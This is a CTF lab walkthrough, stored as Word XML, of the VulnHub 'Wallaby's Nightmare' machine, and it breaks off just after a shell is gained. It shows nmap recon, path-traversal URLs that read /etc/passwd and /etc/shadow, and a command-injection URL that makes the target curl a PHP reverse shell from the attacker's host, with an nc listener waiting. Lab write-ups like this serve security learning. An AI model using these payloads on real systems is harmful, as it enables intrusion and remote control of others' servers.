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BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This segment of my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vulnhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> series covers my walkthrough for the “Wallaby’s Nightmare (v1.0.2)” game.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Finding Host and uncover services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>As always, I began finding the address of the game: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4"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D3BEF" w:rsidTr="009D3B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D3BEF" w:rsidRDefault="009D3BEF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D3BEF" w:rsidTr="009D3B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BEF" w:rsidRDefault="009D3BEF"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nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 192.168.110.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In my case, target got assigned IP address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.110.11</w:t>
      </w:r>
      <w:r>
        <w:t>. Then moved on uncovering services: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2"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D3BEF" w:rsidTr="009D3B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D3BEF" w:rsidRDefault="009D3BEF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D3BEF" w:rsidTr="009D3B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BEF" w:rsidRDefault="009D3BEF"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nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p1-65535 -A -T4 -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 192.168.110.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Target did not expose many services, only three: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"/>
        <w:gridCol w:w="714"/>
        <w:gridCol w:w="1271"/>
        <w:gridCol w:w="1013"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D3BEF" w:rsidTr="009D3B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D3BEF" w:rsidRDefault="009D3BEF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Port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>
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs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>
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Product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>
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D3BEF" w:rsidTr="009D3B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BEF" w:rsidRDefault="009D3BEF">
            <w:r>
              <w:t>22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>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh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D3BEF" w:rsidRDefault="009D3BEF">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>OpenSSH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D3BEF" w:rsidRDefault="009D3BEF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D3BEF" w:rsidTr="009D3B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BEF" w:rsidRDefault="009D3BEF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>80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>
            <w:r>
              <w:t>http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>
            <w:r>
              <w:t xml:space="preserve">Apache </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>httpd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D3BEF" w:rsidRDefault="009D3BEF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D3BEF" w:rsidTr="009D3B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BEF" w:rsidRDefault="009D3BEF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>6667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>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>irc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D3BEF" w:rsidRDefault="009D3BEF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Attacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>For this game I started out investigating the web service. This is the landing page on port 80:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="895350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="Picture 26" descr="WN - Username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N - Username registra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Username registration </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Inspection of the HTML source did not give away useful hints. Moved on registering myself:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="2943225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="25" name="Picture 25" descr="WN - Registered user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N - Registered usernam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Registered username </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From inspecting the HTML source I found that the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start the CTF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> link had an interesting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter which could be a candidate for fuzzing attempt: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5811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>&lt;a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href</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>="/?page=home"&gt;&lt;h2&gt;Start the CTF!&lt;/h2&gt;&lt;/a&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Clicking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start the CTF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> link brought me to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="1924050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="Picture 24" descr="WN - What the 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N - What the hec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All </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>seeing eye</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The HTML on this page did not reveal anything interesting either. I started playing with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter by feeding various input to it. A single quotation mark made the internal security mechanism blacklist my IP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Picture 23" descr="WN - Blacklisted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N - Blacklisted I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Blacklisted IP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Toying too much with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter resulted in the target moving the web service to another port. After reissuing my service scan I found that the web service had moved to port 60080:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="3238500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Picture 22" descr="WN - HolyMoly service mo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N - HolyMoly service mov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Service on the move </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Still with the security mechanism in mind, that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter seemed to be the best attack point. I started toying with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to see if I could fish out some files. Most often I try to find the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file. And I did: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8882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lastRenderedPageBreak/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hyperlink r:id="rId10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</w:rPr>
                <w:t>http://192.168.110.11:60080/?page=../../../../../../../../../../etc/passwd</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Picture 21" descr="WN - pass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N - passw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Some </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file I found </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This seemed promising. Tried to fish out the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file too: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8882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hyperlink r:id="rId12" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>http://192.168.110.11:60080/?page=../../../../../../../../../../etc/shadow</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>No luck, no access. Realized manual procedure was too time consuming. Moved over to fuzzing.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6"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D3BEF" w:rsidTr="009D3B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D3BEF" w:rsidRDefault="009D3BEF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D3BEF" w:rsidTr="009D3BE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BEF" w:rsidRDefault="009D3BEF"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dirb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 192.168.110.11:60080/?page= /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/share/wordlists/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dirb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/big.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="3495675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="20" name="Picture 20" descr="WN - Di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N - Dir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Dirbusting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Of the lot discovered only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mailer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> resulted in a page. This is the HTML source of it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="19" name="Picture 19" descr="WN - Mailer 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N - Mailer HTM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Mailer HTML </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Looked at the comments, this page had an additional </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that caught my eye. I began toying with it and found that it accepted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> commands, in this case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5314950" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Picture 18" descr="WN - Mail paremeter vulner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N - Mail paremeter vulnerab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Parameter vulnerable </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command revealed the presence of a PHP file. This lead </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>me</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to believe dropping a PHP shell was doable. Next I tried to find a way to drop a shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="885825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="17" name="Picture 17" descr="WN - Looking for C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N - Looking for Cur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Looking for Curl </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Support for Curl found – dropping was doable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>PHP Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I prepared my old trusty </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shelly.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell by first copying it to current directory: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7371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 xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>cp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usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/share/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>webshells</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-reverse-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>shell.php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shelly.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Then tailored it with my IP and listening port:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 192.168.110.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF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Port: 7777</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Then set up a web server the target could fetch Shelly from. This command was issued from the current directory where I copied Shelly to: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3241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 xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> -S 192.168.110.6:4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Then I set up a local listener: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1610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 xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>nc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-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>lvp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7777</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Then made the target fetch Shelly. I used the following URL in Firefox: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9248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>http://192.168.110.11:60080/?page=mailer&amp;mail=curl%20-O%20http://192.168.110.6:4444/shelly.txt;mv%20shelly.txt%20shelly.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Then finally I executed the shell, once again in Firefox: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4561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>http://192.168.110.11:60080/shelly.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>This gave me a shell:</w:t>
      </w:r>
    </w:p>
